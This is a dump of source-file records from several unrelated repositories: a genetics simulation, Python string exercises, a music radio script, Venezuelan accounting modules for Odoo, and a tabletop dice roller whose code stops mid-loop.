"content_id": "73fbe62be2f0e4b6fede2f01073b3bf4bdf22fd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 20,
"path": "/makefile",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "standard:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -o bio\ndebug:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D DEBUG=true -o bio\nspeedtest:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast -frename-registers generations.c -msse4.2 -D SPEEDTEST=true -o bio\nunoptimized_speedtest:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -O0 generations.c -msse4.2 -D SPEEDTEST=true -o bio\nspeeddebug:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D SPEEDTEST=true -g -o bio\nthreaded:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D THREADED=true -o bio\nthreaded_debug:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast generations.c -msse4.2 -D THREADED=true -D DEBUG=true -o bio\nrand_test:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast -msse4.2 -mrdrnd test_rand_speed.c -o test_rand_speed\nfaster:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 -Ofast -msse4.2 faster.c -o faster\ninterleaved_speedtest:\n\t/usr/local/cellar/gcc/8.2.0/bin/gcc-8 generations.c -o test -Wa,-adhln=test-O3.s -g -fverbose-asm -Ofast -march=native\n"
},
{
"alpha_fraction": 0.5527865886688232,
"alphanum_fraction": 0.6017218232154846,
"avg_line_length": 32.9538459777832,
"blob_id": "b574bc610cd76a5ea0b421f3dfc29ac847b33f7e",
"content_id": "293e5fb29887a793b2e6397d4184dff878da88fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2207,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 65,
"path": "/generations.py",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "# bio_generations\n\n# 45 seconds for (65536,100) = 145k/s\n# 20 seconds for (30000,100) = 152k/s\n# 6.73 seconds for (10000,100) = 148k/s\n# 62 seconds for (5000,300) = 24k/s\n# 208 seconds for (5000,6000) = 144k/s\n# 192 seconds for (3000,7000) = 109k/s\n\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom IPython import embed\ndef get_organism():\n return [random.randint(0,1),random.randint(0,1)]\ndef mate(a,b):\n return [random.choice(a),random.choice(b)]\ndef generate_types(num_generations):\n a_a = []\n a_b = []\n b_b = []\n for generation in num_generations:\n a_a_num = 0\n a_b_num = 0\n b_b_num = 0\n for organism in generation:\n if organism == [0,0]:\n a_a_num += 1\n elif organism == [0,1] or organism == [1,0]:\n a_b_num += 1\n else:\n b_b_num += 1\n a_a.append(a_a_num)\n a_b.append(a_b_num)\n b_b.append(b_b_num)\n total = (a_a[0] + b_b[0] + a_b[0])/100\n a_a = [a/total for a in a_a]\n a_b = [a/total for a in a_b]\n b_b = [a/total for a in b_b]\n return a_a,a_b,b_b\ndef backplot(generations=None,others=[]):\n if generations:\n a_a,a_b,b_b = generate_types(generations)\n else:\n a_a,a_b,b_b = others\n line_first, = plt.plot(a_a,label='AA genome')\n line_second, = plt.plot(a_b,label='AB genome or BA genome')\n line_third, = plt.plot(b_b,label='BB genome')\n plt.legend([line_first,line_second,line_third],[\"AA genome\",\"AB or BA genome\",\"BB genome\"])\ndef plot_generations(generations):\n backplot(generations)\n plt.show()\ndef savefig(generations,name):\n backplot(generations)\n plt.savefig(name)\ndef get_generations(num_individuals,num_generations):\n generations = []\n last_gen = [get_organism() for a in range(num_individuals)]\n while len(generations) < num_generations:\n newgen = [mate(random.choice(last_gen),random.choice(last_gen)) for a in range(num_individuals)]\n generations.append(newgen)\n last_gen = newgen\n if len(generations) % 1000 == 0:\n print(\"Currently at generation {0} out of {1}\".format(len(generations),num_generations))\n return generations\n"
}
] | 11 |
18031J0012/Python | https://github.com/18031J0012/Python | 0ae628e1913ff4662b1f15301b07e95ee984e61c | 1df1359b2e4599364f753d0d80b8422ad251b628 | a434c6bc117fd3fbef5459df17e633adfd88ad29 | refs/heads/master | 2020-04-19T09:00:51.688322 | 2019-01-29T07:10:08 | 2019-01-29T07:10:08 | 168,097,235 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5267326831817627,
"alphanum_fraction": 0.5485148429870605,
"avg_line_length": 27.05555534362793,
"blob_id": "f967e84cc4c23b246aae16fa73b44bad53814fea",
"content_id": "a1eea51d1f0c04e05331c395f034da9ebf797ac1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 18,
"path": "/p2/bob_counter.py",
"repo_name": "18031J0012/Python",
"src_encoding": "UTF-8",
"text": "'''Assume s is a string of lower case characters.\n\nWrite a program that prints the number of times the string 'bob' occurs in s. For example, if s = 'azcbobobegghakl', then your program should print\n\nNumber of times bob occurs is: 2'''\n\ndef main():\n s=input()\n s1=s.lower()\n count=0\n for i in range(len(s1)-2):\n if(s1[i]=='b' and s1[i+1]=='o' and s1[i+2]=='b'):\n count = count + 1\n print(count)\n\t\n\nif __name__== \"__main__\":\n\tmain()\n"
},
{
"alpha_fraction": 0.434684693813324,
"alphanum_fraction": 0.45270270109176636,
"avg_line_length": 20.095237731933594,
"blob_id": "b908356124dfda7fc6356476f2b50b9e78e76406",
"content_id": "06c5b14e0d4a7bc0b698cb1fe5d669c2e7012b9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 21,
"path": "/p3/longest_substring.py",
"repo_name": "18031J0012/Python",
"src_encoding": "UTF-8",
"text": "def main():\n s = input()\n # the input string is in s\n # remove pass and start your code here\n maxlen=0\n current=s[0]\n long=s[0]\n \n for i in range(len(s)-1):\n if s[i+1]>=s[i]:\n current+=s[i+1]\n if len(current)>maxlen:\n maxlen=len(current)\n long=current\n else:\n current=s[i+1]\n i+=1\n print(long)\n \nif __name__== \"__main__\":\n main()\n\n"
}
] | 2 |
KhanradCoder/KhanradRadio | https://github.com/KhanradCoder/KhanradRadio | 03ef2249b7d21c76fc71eae7639b42904a330f65 | 8033d2c15f0c4c4a2f82761bcc1ba5ded0737e0a | c2d836b64f2145f36cadee21f751a5a125889bd3 | refs/heads/master | 2021-01-17T12:19:13.154958 | 2015-12-19T15:06:01 | 2015-12-19T15:06:01 | 35,572,469 | 6 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7578740119934082,
"alphanum_fraction": 0.7795275449752808,
"avg_line_length": 22.090909957885742,
"blob_id": "922c42d3bd8f068995c8e1c28a8434d8496b317b",
"content_id": "d3b5072d67d247cc7e94320d22e6656fd4aa65e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 22,
"path": "/README.md",
"repo_name": "KhanradCoder/KhanradRadio",
"src_encoding": "UTF-8",
"text": "# Khanrad Radio\n\nKhanrad Radio uses python to play your music like a radio show. \nYou choose a folder and it randomly selects a song for you. Inbetween songs, Khanrad Radio tells you the weather, time and upcoming songs.\n\nSee Demo Here: https://www.youtube.com/watch?v=PJJM8UeyPSM&list=PLvk-72jrjBFHtvl530CHKjxYeHcxEaV08&index=2\n\nDependencies:\n\npython 2.7,\npynotify,\nespeak,\npywapi,\nmplayer, \n\nThere are many keyboard commands for mplayer:\n\nSPACE : Pause\n\nCTR+C : Change song\n\nARROW : Fast Forward or Rewind\n"
},
{
"alpha_fraction": 0.6590056419372559,
"alphanum_fraction": 0.6674484014511108,
"avg_line_length": 25.649999618530273,
"blob_id": "7c3bb8b9c4719c31665b1b15f7cc0f0c00a4ea48",
"content_id": "ad3d120ac8b2b01d1e6748e1b02bd14b6ef8abee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2132,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 80,
"path": "/radio.py",
"repo_name": "KhanradCoder/KhanradRadio",
"src_encoding": "UTF-8",
"text": "import os, random\nfrom espeak import espeak\nimport time\nfrom datetime import datetime\nimport pywapi\nimport string\nimport pynotify\nimport subprocess\n\nimport commands\ncmd = \"whoami\"\noutput = commands.getoutput(cmd)\n\n\nnow = datetime.now()\ncurTime = now.hour , now.minute\nespeak.synth(\"Welcome to khanrad radio. The time is \"+str(curTime))\ntime.sleep(1.5)\n\nmusic_path = os.path.join(\"/home/\",output,\"Music/\")\n\nespeak.synth(\"Please choose a folder\")\nprint 'Press CTRL+C to change the current song (Terminal)'\nprint os.listdir(music_path)\n\nfolder = raw_input(\"Choose a folder: \")\ntime.sleep(3)\n\ndef rndmp3 ():\n randomfile = random.choice(os.listdir(\"/home/\"+output+\"/Music/\"+folder+\"/\"))\n file = ' /home/'+output+'/Music/'+folder+'/'+ randomfile\n\n pynotify.init( \"Radio\" )\n song = pynotify.Notification('Playing '+randomfile)\n song.show()\n\n espeak.synth('Playing '+randomfile)\n print 'Playing '+randomfile\n time.sleep(1)\n os.system ('mplayer' + file)\n time.sleep(2)\n\nwhile True:\n\n rndmp3()\n\n pynotify.init( \"Radio\" )\n ranNum = random.randrange(0,6)\n\n now = datetime.now()\n curTime = now.hour , now.minute\n\n if ranNum == 1:\n espeak.synth('Thank you for watching khanrad radio')\n time.sleep(1.5)\n mssg = pynotify.Notification('Thank you for watching khanrad radio')\n\n if ranNum == 2:\n espeak.synth(\"The time is \"+str(curTime))\n time.sleep(1.5)\n mssg = pynotify.Notification('The time is '+str(curTime))\n\n if ranNum == 3:\n weather_com_result = pywapi.get_weather_from_weather_com()#IMPORT ZIPCODE HERE\n espeak.synth(\"The weather is \" + string.lower(weather_com_result['current_conditions']['text'])\n + \" at \" +weather_com_result['current_conditions']['temperature']\n + \" degrees celsius \\n\\n\")\n time.sleep(2.5)\n mssg = pynotify.Notification(\"The weather is \" + string.lower(weather_com_result['current_conditions']['text'])\n + \" at \" +weather_com_result['current_conditions']['temperature']\n + \"degrees celsius \\n\\n\")\n\n else:\n print \"Are you enjoying khanrad radio?\"\n\n\n try:\n mssg.show()\n except NameError:\n pass\n"
}
] | 2 |
izzihector/clientes | https://github.com/izzihector/clientes | e6f1c3cb2be1a055b67db101b78b8cd5a05158a7 | 04a572976c5f6567742a2df1d90b14dd76541678 | 7d14b166abb6f3fc43fe0dd2a5628a4be5673d14 | refs/heads/master | 2023-02-11T06:38:47.962447 | 2021-01-08T00:26:07 | 2021-01-08T00:26:07 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5972195267677307,
"alphanum_fraction": 0.6016605496406555,
"avg_line_length": 46.96296310424805,
"blob_id": "c9b8e93d53199e4178484b63bac7135d4a607615",
"content_id": "ef9a1c70b400ad7e1495b8d6abd6ada4f1503154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5181,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 108,
"path": "/LocalizacionV13/ext_personalizacion_lanta/model/models.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom odoo import fields, models, api, exceptions, _\nfrom odoo.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger('__name__')\n\n\nclass AccountInherit(models.Model):\n \"\"\"This model add fields need in the invoice for accounting in Venezuela.\"\"\"\n _inherit = 'account.move'\n\n #rif = fields.Char(related='partner_id.vat', string='RIF', store=True)\n \"\"\"rif = fields.Char(compute='_concatena', string='RIF')\n\n @api.depends('partner_id')\n def _concatena(self):\n if self.partner_id.doc_type==\"v\":\n tipo_doc=\"V\"\n if self.partner_id.doc_type==\"e\":\n self.partner_id.doc_type=\"E\"\n if self.partner_id.doc_type==\"g\":\n tipo_doc=\"G\"\n if self.partner_id.doc_type==\"j\":\n tipo_doc=\"J\"\n if self.partner_id.doc_type==\"p\":\n tipo_doc=\"P\"\n if self.partner_id.doc_type==\"c\":\n tipo_doc=\"C\"\n if not self.partner_id.doc_type:\n tipo_doc=\"?\"\n self.rif=str(tipo_doc)+\"-\"+str(self.partner_id.vat)\"\"\"\n\n def funcion_numeracion_fac(self):\n if self.type==\"in_invoice\":\n busca_correlativos = self.env['account.move'].search([('invoice_number','=',self.invoice_number_pro),('id','!=',self.id)])\n for det_corr in busca_correlativos:\n if det_corr.invoice_number:\n raise UserError(_(' El valor :%s ya se uso en otro documento')%det_corr.invoice_number)\n\n busca_correlativos2 = self.env['account.move'].search([('invoice_ctrl_number','=',self.invoice_ctrl_number_pro),('id','!=',self.id)])\n for det_corr2 in busca_correlativos2:\n if det_corr2.invoice_ctrl_number:\n raise UserError(_(' El nro de control :%s ya se uso en otro documento')%det_corr2.invoice_ctrl_number)\n \n self.invoice_number=self.invoice_number_pro\n self.invoice_ctrl_number=self.invoice_ctrl_number_pro\n partners='pro' # aqui si es un proveedor\n\n if self.type==\"in_refund\" or self.type==\"in_receipt\":\n busca_correlativos = self.env['account.move'].search([('invoice_number','=',self.refuld_number_pro),('id','!=',self.id)])\n for det_corr in busca_correlativos:\n if det_corr.invoice_number:\n raise UserError(_(' El valor :%s ya se uso en otro documento')%det_corr.invoice_number)\n\n busca_correlativos2 = self.env['account.move'].search([('invoice_ctrl_number','=',self.refund_ctrl_number_pro),('id','!=',self.id)])\n for det_corr2 in busca_correlativos2:\n if det_corr2.invoice_ctrl_number:\n raise UserError(_(' El nro de control :%s ya se uso en otro documento')%det_corr2.invoice_ctrl_number)\n \n self.invoice_number=self.refuld_number_pro\n self.invoice_ctrl_number=self.refund_ctrl_number_pro\n partners='cli' # aqui si es un cliente\n\n if self.type==\"out_invoice\":\n self.invoice_number_cli=self.get_invoice_number_cli()\n self.invoice_number=self.invoice_number_cli #self.get_invoice_number_cli()\n self.invoice_ctrl_number_cli=self.get_invoice_ctrl_number_unico()\n self.invoice_ctrl_number=self.invoice_ctrl_number_cli #self.get_invoice_ctrl_number_cli()\n\n if self.type==\"out_refund\":\n self.refuld_number_cli=self.get_refuld_number_cli()\n self.invoice_number=self.refuld_number_cli #self.get_refuld_number_cli()\n self.refund_ctrl_number_cli=self.get_invoice_ctrl_number_unico()\n self.invoice_ctrl_number=self.refund_ctrl_number_cli #self.get_refuld_ctrl_number_cli()\n\n if self.type==\"out_receipt\":\n self.refuld_number_cli=self.get_refuld_number_pro()\n self.invoice_number=self.refuld_number_cli #self.get_refuld_number_cli()\n self.refund_ctrl_number_cli=self.get_invoice_ctrl_number_unico()\n 
self.invoice_ctrl_number=self.refund_ctrl_number_cli #self.get_refuld_ctrl_number_cli()\n #self.invoice_number=self.get_nro_cliente()\n\n def get_invoice_ctrl_number_unico(self):\n '''metodo que crea el Nombre del asiento contable si la secuencia no esta creada, crea una con el\n nombre: 'l10n_ve_cuenta_retencion_iva'''\n\n self.ensure_one()\n SEQUENCE_CODE = 'l10n_ve_nro_control_unico_formato_libre'\n company_id = 1\n IrSequence = self.env['ir.sequence'].with_context(force_company=1)\n name = IrSequence.next_by_code(SEQUENCE_CODE)\n\n # si aún no existe una secuencia para esta empresa, cree una\n if not name:\n IrSequence.sudo().create({\n 'prefix': '00-',\n 'name': 'Localización Venezolana nro control Unico Factura Forma Libre %s' % 1,\n 'code': SEQUENCE_CODE,\n 'implementation': 'no_gap',\n 'padding': 4,\n 'number_increment': 1,\n 'company_id': 1,\n })\n name = IrSequence.next_by_code(SEQUENCE_CODE)\n #self.invoice_number_cli=name\n return name"
},
{
"alpha_fraction": 0.5652835965156555,
"alphanum_fraction": 0.5677579045295715,
"avg_line_length": 37.59558868408203,
"blob_id": "6845586ea9987fe7d4cbc31a4911648b69d625e8",
"content_id": "51eb856f578c976ff11120eb45d63e45b7db6181",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5254,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 136,
"path": "/LocalizacionV13/municipality_tax/models/account_move.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom odoo import api, fields, models, _ \nfrom odoo.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger('__name__')\n\n\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n\n\n concept_id = fields.Many2one('muni.wh.concept', string='Municipal Tax')\n\n\n def _check_balanced(self):\n ''' Assert the move is fully balanced debit = credit.\n An error is raised if it's not the case.\n '''\n moves = self.filtered(lambda move: move.line_ids)\n if not moves:\n return\n\n # /!\\ As this method is called in create / write, we can't make the assumption the computed stored fields\n # are already done. Then, this query MUST NOT depend of computed stored fields (e.g. balance).\n # It happens as the ORM makes the create with the 'no_recompute' statement.\n self.env['account.move.line'].flush(['debit', 'credit', 'move_id'])\n self.env['account.move'].flush(['journal_id'])\n self._cr.execute('''\n SELECT line.move_id, ROUND(SUM(debit - credit), currency.decimal_places)\n FROM account_move_line line\n JOIN account_move move ON move.id = line.move_id\n JOIN account_journal journal ON journal.id = move.journal_id\n JOIN res_company company ON company.id = journal.company_id\n JOIN res_currency currency ON currency.id = company.currency_id\n WHERE line.move_id IN %s\n GROUP BY line.move_id, currency.decimal_places\n HAVING ROUND(SUM(debit - credit), currency.decimal_places) != 0.0;\n ''', [tuple(self.ids)])\n\n query_res = self._cr.fetchall()\n if query_res:\n ids = [res[0] for res in query_res]\n sums = [res[1] for res in query_res]\n\n\n\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n\n wh_muni_id = fields.Many2one('municipality.tax', string='Withholding municipal tax', readonly=True, copy=False)\n\n\n def _create_muni_wh_voucher(self):\n\n vals = {}\n values = {}\n muni_wh = self.env['municipality.tax']\n muni_wh_line = self.env['account.move.line']\n _logger.info(\"\"\"\\n\\n\\n Hola se esta ejecutando el action_post de la retencion municipal\\n\\n\\n\"\"\")\n # _logger.info(\"\"\"\\n\\n\\n\\n invoice %s \\n\\n\\n\"\"\", invoice)\n # se crea el registro del modelo municipality.tax.line\n res = []\n for item in self.invoice_line_ids:\n # codigo darrell\n base_impuesto=item.price_subtotal\n impuesto_mun=item.concept_id.aliquot\n # fin codigo darrell\n #raise UserError(_('impuesto_mun= %s')%impuesto_mun)\n if item.concept_id.aliquot>0:\n res.append((0,0, {\n 'code': item.concept_id.code,\n 'aliquot': item.concept_id.aliquot,\n 'concept_id': item.concept_id.id,\n #'base_tax': self.amount_untaxed,\n 'base_tax': base_impuesto, # correcion darrell\n 'invoice_id': self.id,\n 'invoice_date' : self.date,\n 'invoice_number': self.invoice_number,\n 'invoice_ctrl_number': self.invoice_ctrl_number,\n #'type':self.type, # nuevo darrell\n }))\n _logger.info(\"\\n\\n\\n res %s \\n\\n\\n\\n\", res)\n # Se crea el registro de la retencion\n vals = {\n 'partner_id': self.partner_id.id,\n 'rif': self.partner_id.vat,\n 'invoice_id': self.id,\n 'act_code_ids': res,\n #'type':self.type,\n }\n _logger.info(\"\\n\\n\\n vals %s \\n\\n\\n\", vals)\n muni_tax = muni_wh.create(vals)\n _logger.info(\"\\n\\n\\n muni %s\\n\\n\\n\", muni_tax)\n self.write({'wh_muni_id': muni_tax.id})\n #raise UserError(_('cuentas = %s')%self.write({'wh_muni_id': muni_tax.id}))\n\n def actualiza_voucher_wh(self):\n #raise UserError(_('mama = %s')%self)\n cursor_municipality = 
self.env['municipality.tax'].search([('id','=',self.wh_muni_id.id)])\n for det in cursor_municipality:\n self.env['municipality.tax'].browse(det.id).write({\n 'type': self.type,\n })\n\n\n def action_post(self):\n \"\"\"This function create municital retention voucher too.\"\"\"\n invoice = super().action_post()\n # es agente de retencion municipal\n _logger.info(\"\\n\\n\\n\\n action_post de Impuestos municipales \\n\\n\\n\\n\")\n \n if self.partner_id.muni_wh_agent==True or self.company_id.partner_id.muni_wh_agent==True:\n # si no existe una retencion ya\n bann=0\n bann=self.verifica_exento_muni()\n if bann>0:\n if not self.wh_muni_id:\n self._create_muni_wh_voucher()\n self.actualiza_voucher_wh()\n return invoice\n\n def verifica_exento_muni(self):\n acum=0\n #raise UserError(_('self = %s')%self.id)\n puntero_move_line = self.env['account.move.line'].search([('move_id','=',self.id)])\n for det_puntero in puntero_move_line:\n acum=acum+det_puntero.concept_id.aliquot\n return acum\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.49419301748275757,
"alphanum_fraction": 0.49559471011161804,
"avg_line_length": 45.25,
"blob_id": "6527c0cb260b737c13c82ce13b27f1a126a1e04c",
"content_id": "72233c4d12a533801acad0a2e40fbc246936d20a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4994,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 108,
"path": "/LocalizacionV13/libros_filtros/model/mymodules.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, api, exceptions\nimport logging\nfrom odoo.exceptions import UserError\n\n\nclass AccountBankSatatement(models.Model):\n\t_inherit = \"account.bank.statement.line\"\n\tvalidador = fields.Boolean(value=False)\n\n\n\nclass AccountBankStatementLine(models.Model):\n\n\t_inherit = \"account.move\"\n\t_decription = \"Filtra las facturas que no aparescan en los libros\"\n\n\tocultar_libros = fields.Boolean(defaul=False, value=False)\n\n\nclass libro_compras(models.TransientModel):\n _inherit = \"account.wizard.libro.compras\"\n\n def get_invoice(self):\n self.facturas_ids = self.env['account.move'].search([\n ('invoice_date','>=',self.date_from),\n ('invoice_date','<=',self.date_to),\n ('ocultar_libros','!=','True'),\n ('state','in',('posted','cancel' )),\n ('type','in',('in_invoice','in_refund','in_receipt'))\n ],order=\"invoice_date asc\")\n temp = self.env['account.wizard.pdf.compras'].search([])\n\n for t in temp:\n t.unlink()\n\n for factura in self.facturas_ids :\n for line in factura.invoice_line_ids:\n for tax in line.tax_ids:\n if tax.aliquot:\n self.env['account.wizard.pdf.compras'].create({\n 'name':factura.invoice_date,\n 'document': factura.partner_id.vat,\n 'partner':factura.partner_id.id,\n 'invoice_number': factura.invoice_number,#darrell\n 'tipo_doc': factura.journal_id.tipo_doc,\n 'invoice_ctrl_number': factura.invoice_ctrl_number,\n 'sale_total': line.price_total,\n 'base_imponible': line.price_subtotal,\n 'iva' : line.price_subtotal * (tax.amount / 100),\n 'state_retantion': factura.vat_ret_id.state,\n 'iva_retenido': factura.vat_ret_id.vat_retentioned,\n 'retenido': factura.vat_ret_id.name,\n 'retenido_date':factura.vat_ret_id.voucher_delivery_date,\n 'alicuota':tax.description,\n 'alicuota_type': tax.aliquot,\n 'state': factura.state,\n 'reversed_entry_id':factura.id,\n 'import_form_num':factura.import_form_num,\n 'import_dossier':factura.import_dossier,\n 'import_date': factura.import_date,\n 'ref':factura.ref,\n })\n self.line = self.env['account.wizard.pdf.compras'].search([],order=\"name desc\")\n pass\n\nclass libro_ventas(models.TransientModel):\n _inherit = \"account.wizard.libro.ventas\"\n\n def get_invoice(self):\n self.facturas_ids = self.env['account.move'].search([\n ('invoice_date','>=',self.date_from),\n ('invoice_date','<=',self.date_to),\n ('ocultar_libros','!=','True'),\n ('state','in',('posted','cancel' )),\n ('type','in',('out_invoice','out_refund','out_receipt'))\n ])\n temp = self.env['account.wizard.pdf.ventas'].search([])\n\n for t in temp:\n t.unlink()\n for factura in self.facturas_ids :\n for line in factura.invoice_line_ids:\n for tax in line.tax_ids:\n if tax.aliquot:\n self.env['account.wizard.pdf.ventas'].create({\n 'name':factura.invoice_date,\n 'document': factura.partner_id.vat,\n 'partner':factura.partner_id.id,\n 'invoice_number': factura.invoice_number,#darrell\n 'tipo_doc': factura.journal_id.tipo_doc,\n 'invoice_ctrl_number': factura.invoice_ctrl_number,\n 'sale_total': line.price_total,\n 'base_imponible': line.price_subtotal,\n 'iva' : line.price_subtotal * (tax.amount / 100),\n 'iva_retenido': factura.vat_ret_id.vat_retentioned,\n 'retenido': factura.vat_ret_id.name,\n 'state_retantion': factura.vat_ret_id.state,\n 'retenido_date':factura.vat_ret_id.voucher_delivery_date,\n 'alicuota':tax.description,\n 'alicuota_type': tax.aliquot,\n 'state': factura.state,\n 'reversed_entry_id':factura.reversed_entry_id.id,\n 'currency_id':factura.currency_id.id,\n 
'ref':factura.ref,\n })\n self.line = self.env['account.wizard.pdf.ventas'].search([])"
},
{
"alpha_fraction": 0.5399218201637268,
"alphanum_fraction": 0.5421552062034607,
"avg_line_length": 28.37704849243164,
"blob_id": "bd0cd06974eb8f548d3eeebda47d18a35ab081e4",
"content_id": "8d6379f25118acd9d8e66894b3ba41add34c86c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1791,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 61,
"path": "/LocalizacionV13/ext_filtros_diarios_fact/model/models.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom datetime import datetime\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError\n\n\n_logger = logging.getLogger('__name__')\n\nclass AccountMove(models.Model):\n _inherit = 'account.move' \n\n @api.depends('type')\n def _compute_invoice_filter_type_doc(self):\n\n ejecuta=\"no\"\n if self.type==\"in_invoice\":\n tipo_doc=\"fc\"\n typo=\"purchase\"\n ejecuta=\"si\"\n if self.type==\"in_refund\":\n tipo_doc=\"nc\"\n typo=\"purchase\"\n ejecuta=\"si\"\n if self.type==\"in_receipt\":\n tipo_doc=\"nb\"\n typo=\"purchase\"\n ejecuta=\"si\"\n\n if self.type==\"out_invoice\":\n tipo_doc=\"fc\"\n typo=\"sale\"\n ejecuta=\"si\"\n if self.type==\"out_refund\":\n tipo_doc=\"nc\"\n typo=\"sale\"\n ejecuta=\"si\"\n if self.type==\"out_receipt\":\n tipo_doc=\"nb\"\n typo=\"sale\"\n ejecuta=\"si\"\n \n if ejecuta==\"si\":\n busca_diarios = self.env['account.journal'].search([('tipo_doc','=',tipo_doc),('type','=',typo)])\n for det in busca_diarios:\n idd=det.id\n else:\n idd=1\n self.invoice_filter_type_doc= idd\n\n\n invoice_filter_type_doc = fields.Char(compute='_compute_invoice_filter_type_doc')\n\n journal_id = fields.Many2one('account.journal', string='Journal', required=True)\n #default=invoice_filter_type_doc\n\n \"\"\"journal_id = fields.Many2one('account.journal', string='Journal', required=True, readonly=True,\n states={'draft': [('readonly', False)]},\n domain=\"[('company_id', '=', company_id)]\",\n default=_get_default_journal)\"\"\""
}
] | 4 |
philippe-lemaire/l5r-5th-edition-dice-roller | https://github.com/philippe-lemaire/l5r-5th-edition-dice-roller | 04797ab0cd7c0beacfb777dd75d5bf721a0883db | b855798ecd28224df74064193204fe04ec07d2d4 | f25e6e9be37870802fe9053abbd76c7746af365b | refs/heads/main | 2023-03-14T16:35:14.526426 | 2021-04-05T12:22:51 | 2021-04-05T12:22:51 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7906976938247681,
"alphanum_fraction": 0.8081395626068115,
"avg_line_length": 33.400001525878906,
"blob_id": "84972d133eb839ba24a4a116a85427b502a4bc19",
"content_id": "6301fa051fcedcdb52d6e73034687216b5709b2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 5,
"path": "/README.md",
"repo_name": "philippe-lemaire/l5r-5th-edition-dice-roller",
"src_encoding": "UTF-8",
"text": "# l5r-5th-edition-dice-roller\n\nJust a little beginner project implementing the Legend of the Five Rings 5th Edition dice rolling mechanics.\n\nLots of fun with dictionaries.\n"
},
{
"alpha_fraction": 0.5952956676483154,
"alphanum_fraction": 0.6049681305885315,
"avg_line_length": 34.26356506347656,
"blob_id": "40a1181d9a72cda78a8406e8e1b2ac61faa59735",
"content_id": "cc8863d5f6b01dc510dab68240ffcaa249c42703",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4549,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 129,
"path": "/dice-roller.py",
"repo_name": "philippe-lemaire/l5r-5th-edition-dice-roller",
"src_encoding": "UTF-8",
"text": "#!python3\n'''\nThis module contains a function to roll and keep dice\nfor the 5th edition of the Legends of the Five Rings (L5R) RPG.\n'''\nimport random\nimport pprint\nimport pyinputplus as pyip\n\npp = pprint.PrettyPrinter(indent=4)\n\n\ndef roll(ring, skill):\n '''takes in a ring value and a skill value, returns a tuple of successes,\n opportunities and strife gained.'''\n ringDice = {\n 1: [''],\n 2: ['Opportunity', 'Strife'],\n 3: ['Opportunity'],\n 4: ['Success', 'Strife'],\n 5: ['Success'],\n 6: ['Explosive Success', 'Strife'],\n }\n\n skillDice = {\n 1: [''],\n 2: [''],\n 3: ['Opportunity'],\n 4: ['Opportunity'],\n 5: ['Opportunity'],\n 6: ['Success', 'Strife'],\n 7: ['Success', 'Strife'],\n 8: ['Success'],\n 9: ['Success'],\n 10: ['Success', 'Opportunity'],\n 11: ['Explosive Success', 'Strife'],\n 12: ['Explosive Success', ''],\n }\n\n rawResult = {}\n\n for die in range(ring):\n face = random.randint(1, 6)\n rawResult['Ring die ' + str(die + 1)] = ringDice[face]\n\n for die in 